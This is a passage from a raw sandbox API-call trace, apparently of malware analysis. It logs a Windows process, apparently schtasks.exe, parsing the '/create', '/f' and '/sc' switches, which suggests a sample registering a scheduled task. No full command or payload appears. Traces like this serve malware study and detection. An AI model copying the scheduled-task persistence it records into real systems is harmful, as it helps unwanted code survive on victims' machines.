lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.708] lstrlenW (lpString="xml") returned 3 [0067.708] GetThreadLocale () returned 0x409 [0067.708] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.708] lstrlenW (lpString="ec") returned 2 [0067.708] GetThreadLocale () returned 0x409 [0067.708] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.708] lstrlenW (lpString="rl") returned 2 [0067.708] GetThreadLocale () returned 0x409 [0067.708] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.708] lstrlenW (lpString="delay") returned 5 [0067.708] GetThreadLocale () returned 0x409 [0067.708] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.708] lstrlenW (lpString="np") returned 2 [0067.708] SetLastError (dwErrCode=0x0) [0067.708] SetLastError (dwErrCode=0x0) [0067.708] lstrlenW (lpString="/create") returned 7 [0067.708] lstrlenW (lpString="-/") returned 2 [0067.708] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0067.709] lstrlenW (lpString="create") returned 6 [0067.709] lstrlenW (lpString="create") returned 6 [0067.709] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.709] lstrlenW (lpString="create") returned 6 [0067.709] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.709] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|create|") returned 8 [0067.709] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|create|") returned 8 [0067.709] lstrlenW (lpString="|create|") returned 8 [0067.709] lstrlenW (lpString="|create|") returned 8 [0067.709] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|" [0067.709] SetLastError (dwErrCode=0x0) [0067.709] SetLastError (dwErrCode=0x0) [0067.709] SetLastError (dwErrCode=0x0) [0067.709] lstrlenW (lpString="/f") returned 2 [0067.709] lstrlenW (lpString="-/") returned 2 [0067.709] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0067.709] lstrlenW (lpString="create") returned 6 [0067.709] lstrlenW (lpString="create") returned 6 [0067.709] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.709] lstrlenW (lpString="f") returned 1 [0067.709] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.709] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|create|") returned 8 [0067.709] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.709] lstrlenW (lpString="|create|") returned 8 [0067.709] lstrlenW (lpString="|f|") returned 3 [0067.709] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0 [0067.709] SetLastError (dwErrCode=0x490) [0067.709] lstrlenW (lpString="?") returned 1 [0067.709] lstrlenW (lpString="?") returned 1 [0067.709] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.709] lstrlenW (lpString="f") returned 1 [0067.709] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.709] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|?|") returned 3 [0067.709] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.709] lstrlenW (lpString="|?|") returned 3 [0067.709] lstrlenW (lpString="|f|") returned 3 [0067.709] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0 [0067.710] SetLastError (dwErrCode=0x490) [0067.710] lstrlenW (lpString="s") returned 1 [0067.710] lstrlenW (lpString="s") returned 1 [0067.710] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.710] lstrlenW (lpString="f") returned 1 [0067.710] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.710] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|s|") returned 3 [0067.710] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.710] lstrlenW (lpString="|s|") returned 3 [0067.710] lstrlenW (lpString="|f|") returned 3 [0067.710] StrStrIW (lpFirst="|s|", lpSrch="|f|") returned 0x0 [0067.710] SetLastError (dwErrCode=0x490) [0067.710] lstrlenW (lpString="u") returned 1 [0067.710] lstrlenW (lpString="u") returned 1 [0067.710] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.710] lstrlenW (lpString="f") returned 1 [0067.710] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.710] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|u|") returned 3 [0067.710] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.710] lstrlenW (lpString="|u|") returned 3 [0067.710] lstrlenW (lpString="|f|") returned 3 [0067.710] StrStrIW (lpFirst="|u|", lpSrch="|f|") returned 0x0 [0067.710] SetLastError (dwErrCode=0x490) [0067.710] lstrlenW (lpString="p") returned 1 [0067.710] lstrlenW (lpString="p") returned 1 [0067.710] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.710] lstrlenW (lpString="f") returned 1 [0067.710] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.710] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|p|") returned 3 [0067.710] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.710] lstrlenW (lpString="|p|") returned 3 [0067.710] lstrlenW (lpString="|f|") returned 3 [0067.710] StrStrIW (lpFirst="|p|", lpSrch="|f|") returned 0x0 [0067.710] SetLastError (dwErrCode=0x490) [0067.710] lstrlenW (lpString="ru") returned 2 [0067.710] lstrlenW (lpString="ru") returned 2 [0067.710] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.710] lstrlenW (lpString="f") returned 1 [0067.711] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.711] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|ru|") returned 4 [0067.711] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.711] lstrlenW (lpString="|ru|") returned 4 [0067.711] lstrlenW (lpString="|f|") returned 3 [0067.711] StrStrIW (lpFirst="|ru|", lpSrch="|f|") returned 0x0 [0067.711] SetLastError (dwErrCode=0x490) [0067.711] lstrlenW (lpString="rp") returned 2 [0067.711] lstrlenW (lpString="rp") returned 2 [0067.711] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.711] lstrlenW (lpString="f") returned 1 [0067.711] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.711] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|rp|") returned 4 [0067.711] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.711] lstrlenW (lpString="|rp|") returned 4 [0067.711] lstrlenW (lpString="|f|") returned 3 [0067.711] StrStrIW (lpFirst="|rp|", lpSrch="|f|") returned 0x0 [0067.711] SetLastError (dwErrCode=0x490) [0067.711] lstrlenW (lpString="sc") returned 2 [0067.711] lstrlenW (lpString="sc") returned 2 [0067.711] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.711] lstrlenW (lpString="f") returned 1 [0067.711] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.711] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|sc|") returned 4 [0067.711] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.711] lstrlenW (lpString="|sc|") returned 4 [0067.711] lstrlenW (lpString="|f|") returned 3 [0067.711] StrStrIW (lpFirst="|sc|", lpSrch="|f|") returned 0x0 [0067.711] SetLastError (dwErrCode=0x490) [0067.711] lstrlenW (lpString="mo") returned 2 [0067.711] lstrlenW (lpString="mo") returned 2 [0067.711] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.711] lstrlenW (lpString="f") returned 1 [0067.711] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.711] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|mo|") returned 4 [0067.711] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.711] lstrlenW (lpString="|mo|") returned 4 [0067.711] lstrlenW (lpString="|f|") returned 3 [0067.712] StrStrIW (lpFirst="|mo|", lpSrch="|f|") returned 0x0 [0067.712] SetLastError (dwErrCode=0x490) [0067.712] lstrlenW (lpString="d") returned 1 [0067.712] lstrlenW (lpString="d") returned 1 [0067.712] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.712] lstrlenW (lpString="f") returned 1 [0067.712] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.712] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|d|") returned 3 [0067.712] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.712] lstrlenW (lpString="|d|") returned 3 [0067.712] lstrlenW (lpString="|f|") returned 3 [0067.712] StrStrIW (lpFirst="|d|", lpSrch="|f|") returned 0x0 [0067.712] SetLastError (dwErrCode=0x490) [0067.712] lstrlenW (lpString="m") returned 1 [0067.712] lstrlenW (lpString="m") returned 1 [0067.712] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.712] lstrlenW (lpString="f") returned 1 [0067.712] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.712] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|m|") returned 3 [0067.712] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.712] lstrlenW (lpString="|m|") returned 3 [0067.712] lstrlenW (lpString="|f|") returned 3 [0067.712] StrStrIW (lpFirst="|m|", lpSrch="|f|") returned 0x0 [0067.712] SetLastError (dwErrCode=0x490) [0067.712] lstrlenW (lpString="i") returned 1 [0067.712] lstrlenW (lpString="i") returned 1 [0067.712] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.712] lstrlenW (lpString="f") returned 1 [0067.712] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.712] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|i|") returned 3 [0067.712] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.712] lstrlenW (lpString="|i|") returned 3 [0067.712] lstrlenW (lpString="|f|") returned 3 [0067.712] StrStrIW (lpFirst="|i|", lpSrch="|f|") returned 0x0 [0067.712] SetLastError (dwErrCode=0x490) [0067.712] lstrlenW (lpString="tn") returned 2 [0067.712] lstrlenW (lpString="tn") returned 2 [0067.712] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.713] lstrlenW (lpString="f") returned 1 [0067.713] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.713] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tn|") returned 4 [0067.713] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.713] lstrlenW (lpString="|tn|") returned 4 [0067.713] lstrlenW (lpString="|f|") returned 3 [0067.713] StrStrIW (lpFirst="|tn|", lpSrch="|f|") returned 0x0 [0067.713] SetLastError (dwErrCode=0x490) [0067.713] lstrlenW (lpString="tr") returned 2 [0067.713] lstrlenW (lpString="tr") returned 2 [0067.713] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.713] lstrlenW (lpString="f") returned 1 [0067.713] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.713] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|tr|") returned 4 [0067.713] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.713] lstrlenW (lpString="|tr|") returned 4 [0067.713] lstrlenW (lpString="|f|") returned 3 [0067.713] StrStrIW (lpFirst="|tr|", lpSrch="|f|") returned 0x0 [0067.713] SetLastError (dwErrCode=0x490) [0067.713] lstrlenW (lpString="st") returned 2 [0067.713] lstrlenW (lpString="st") returned 2 [0067.713] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.713] lstrlenW (lpString="f") returned 1 [0067.713] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.713] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|st|") returned 4 [0067.713] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.713] lstrlenW (lpString="|st|") returned 4 [0067.713] lstrlenW (lpString="|f|") returned 3 [0067.713] StrStrIW (lpFirst="|st|", lpSrch="|f|") returned 0x0 [0067.713] SetLastError (dwErrCode=0x490) [0067.713] lstrlenW (lpString="sd") returned 2 [0067.713] lstrlenW (lpString="sd") returned 2 [0067.713] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.713] lstrlenW (lpString="f") returned 1 [0067.713] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.713] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|sd|") returned 4 [0067.713] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.714] lstrlenW (lpString="|sd|") returned 4 [0067.714] lstrlenW (lpString="|f|") returned 3 [0067.714] StrStrIW (lpFirst="|sd|", lpSrch="|f|") returned 0x0 [0067.714] SetLastError (dwErrCode=0x490) [0067.714] lstrlenW (lpString="ed") returned 2 [0067.714] lstrlenW (lpString="ed") returned 2 [0067.714] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.714] lstrlenW (lpString="f") returned 1 [0067.714] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.714] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|ed|") returned 4 [0067.714] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.714] lstrlenW (lpString="|ed|") returned 4 [0067.714] lstrlenW (lpString="|f|") returned 3 [0067.714] StrStrIW (lpFirst="|ed|", lpSrch="|f|") returned 0x0 [0067.714] SetLastError (dwErrCode=0x490) [0067.714] lstrlenW (lpString="it") returned 2 [0067.714] lstrlenW (lpString="it") returned 2 [0067.714] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.714] lstrlenW (lpString="f") returned 1 [0067.714] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.714] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|it|") returned 4 [0067.714] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.714] lstrlenW (lpString="|it|") returned 4 [0067.714] lstrlenW (lpString="|f|") returned 3 [0067.714] StrStrIW (lpFirst="|it|", lpSrch="|f|") returned 0x0 [0067.714] SetLastError (dwErrCode=0x490) [0067.714] lstrlenW (lpString="et") returned 2 [0067.714] lstrlenW (lpString="et") returned 2 [0067.714] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.714] lstrlenW (lpString="f") returned 1 [0067.714] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.714] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|et|") returned 4 [0067.714] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.714] lstrlenW (lpString="|et|") returned 4 [0067.714] lstrlenW (lpString="|f|") returned 3 [0067.714] StrStrIW (lpFirst="|et|", lpSrch="|f|") returned 0x0 [0067.714] SetLastError (dwErrCode=0x490) [0067.714] lstrlenW (lpString="k") returned 1 [0067.714] lstrlenW (lpString="k") returned 1 [0067.715] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.715] lstrlenW (lpString="f") returned 1 [0067.715] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.715] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|k|") returned 3 [0067.715] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.715] lstrlenW (lpString="|k|") returned 3 [0067.715] lstrlenW (lpString="|f|") returned 3 [0067.715] StrStrIW (lpFirst="|k|", lpSrch="|f|") returned 0x0 [0067.715] SetLastError (dwErrCode=0x490) [0067.715] lstrlenW (lpString="du") returned 2 [0067.715] lstrlenW (lpString="du") returned 2 [0067.715] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.715] lstrlenW (lpString="f") returned 1 [0067.715] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.715] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|du|") returned 4 [0067.715] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.715] lstrlenW (lpString="|du|") returned 4 [0067.715] lstrlenW (lpString="|f|") returned 3 [0067.715] StrStrIW (lpFirst="|du|", lpSrch="|f|") returned 0x0 [0067.715] SetLastError (dwErrCode=0x490) [0067.715] lstrlenW (lpString="ri") returned 2 [0067.715] lstrlenW (lpString="ri") returned 2 [0067.715] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.715] lstrlenW (lpString="f") returned 1 [0067.715] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.715] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|ri|") returned 4 [0067.715] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.715] lstrlenW (lpString="|ri|") returned 4 [0067.715] lstrlenW (lpString="|f|") returned 3 [0067.715] StrStrIW (lpFirst="|ri|", lpSrch="|f|") returned 0x0 [0067.715] SetLastError (dwErrCode=0x490) [0067.715] lstrlenW (lpString="z") returned 1 [0067.715] lstrlenW (lpString="z") returned 1 [0067.715] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.715] lstrlenW (lpString="f") returned 1 [0067.715] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.715] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|z|") returned 3 [0067.716] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.716] lstrlenW (lpString="|z|") returned 3 [0067.716] lstrlenW (lpString="|f|") returned 3 [0067.716] StrStrIW (lpFirst="|z|", lpSrch="|f|") returned 0x0 [0067.716] SetLastError (dwErrCode=0x490) [0067.716] lstrlenW (lpString="f") returned 1 [0067.716] lstrlenW (lpString="f") returned 1 [0067.716] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.716] lstrlenW (lpString="f") returned 1 [0067.716] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.716] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.716] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|f|") returned 3 [0067.763] lstrlenW (lpString="|f|") returned 3 [0067.763] lstrlenW (lpString="|f|") returned 3 [0067.763] StrStrIW (lpFirst="|f|", lpSrch="|f|") returned="|f|" [0067.763] SetLastError (dwErrCode=0x0) [0067.763] SetLastError (dwErrCode=0x0) [0067.763] SetLastError (dwErrCode=0x0) [0067.763] lstrlenW (lpString="/sc") returned 3 [0067.763] lstrlenW (lpString="-/") returned 2 [0067.763] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0067.763] lstrlenW (lpString="create") returned 6 [0067.763] lstrlenW (lpString="create") returned 6 [0067.763] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.763] lstrlenW (lpString="sc") returned 2 [0067.763] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.763] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|create|") returned 8 [0067.763] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|sc|") returned 4 [0067.763] lstrlenW (lpString="|create|") returned 8 [0067.763] lstrlenW (lpString="|sc|") returned 4 [0067.763] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0067.763] SetLastError (dwErrCode=0x490) [0067.763] lstrlenW (lpString="?") returned 1 [0067.763] lstrlenW (lpString="?") returned 1 [0067.763] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.763] lstrlenW (lpString="sc") returned 2 [0067.763] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.764] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|?|") returned 3 [0067.764] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|sc|") returned 4 [0067.764] lstrlenW (lpString="|?|") returned 3 [0067.764] lstrlenW (lpString="|sc|") returned 4 [0067.764] SetLastError (dwErrCode=0x490) [0067.764] lstrlenW (lpString="s") returned 1 [0067.764] lstrlenW (lpString="s") returned 1 [0067.764] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.764] lstrlenW (lpString="sc") returned 2 [0067.764] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.764] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|s|") returned 3 [0067.764] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|sc|") returned 4 [0067.764] lstrlenW (lpString="|s|") returned 3 [0067.764] lstrlenW (lpString="|sc|") returned 4 [0067.764] SetLastError (dwErrCode=0x490) [0067.764] lstrlenW (lpString="u") returned 1 [0067.764] lstrlenW (lpString="u") returned 1 [0067.764] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.764] lstrlenW (lpString="sc") returned 2 [0067.764] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.764] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|u|") returned 3 [0067.764] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|sc|") returned 4 [0067.764] lstrlenW (lpString="|u|") returned 3 [0067.764] lstrlenW (lpString="|sc|") returned 4 [0067.764] SetLastError (dwErrCode=0x490) [0067.764] lstrlenW (lpString="p") returned 1 [0067.764] lstrlenW (lpString="p") returned 1 [0067.764] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.764] lstrlenW (lpString="sc") returned 2 [0067.764] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.764] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|p|") returned 3 [0067.764] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|sc|") returned 4 [0067.764] lstrlenW (lpString="|p|") returned 3 [0067.764] lstrlenW (lpString="|sc|") returned 4 [0067.764] SetLastError (dwErrCode=0x490) [0067.764] lstrlenW (lpString="ru") returned 2 [0067.765] lstrlenW (lpString="ru") returned 2 [0067.765] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.765] lstrlenW (lpString="sc") returned 2 [0067.765] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.765] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|ru|") returned 4 [0067.765] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|sc|") returned 4 [0067.765] lstrlenW (lpString="|ru|") returned 4 [0067.765] lstrlenW (lpString="|sc|") returned 4 [0067.765] StrStrIW (lpFirst="|ru|", lpSrch="|sc|") returned 0x0 [0067.765] SetLastError (dwErrCode=0x490) [0067.765] lstrlenW (lpString="rp") returned 2 [0067.765] lstrlenW (lpString="rp") returned 2 [0067.765] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.765] lstrlenW (lpString="sc") returned 2 [0067.765] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.765] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29c944 | out: _Buffer="|rp|") returned 4 [0067.765] _vsnwprintf (in: _Buffer=0x6752d8, 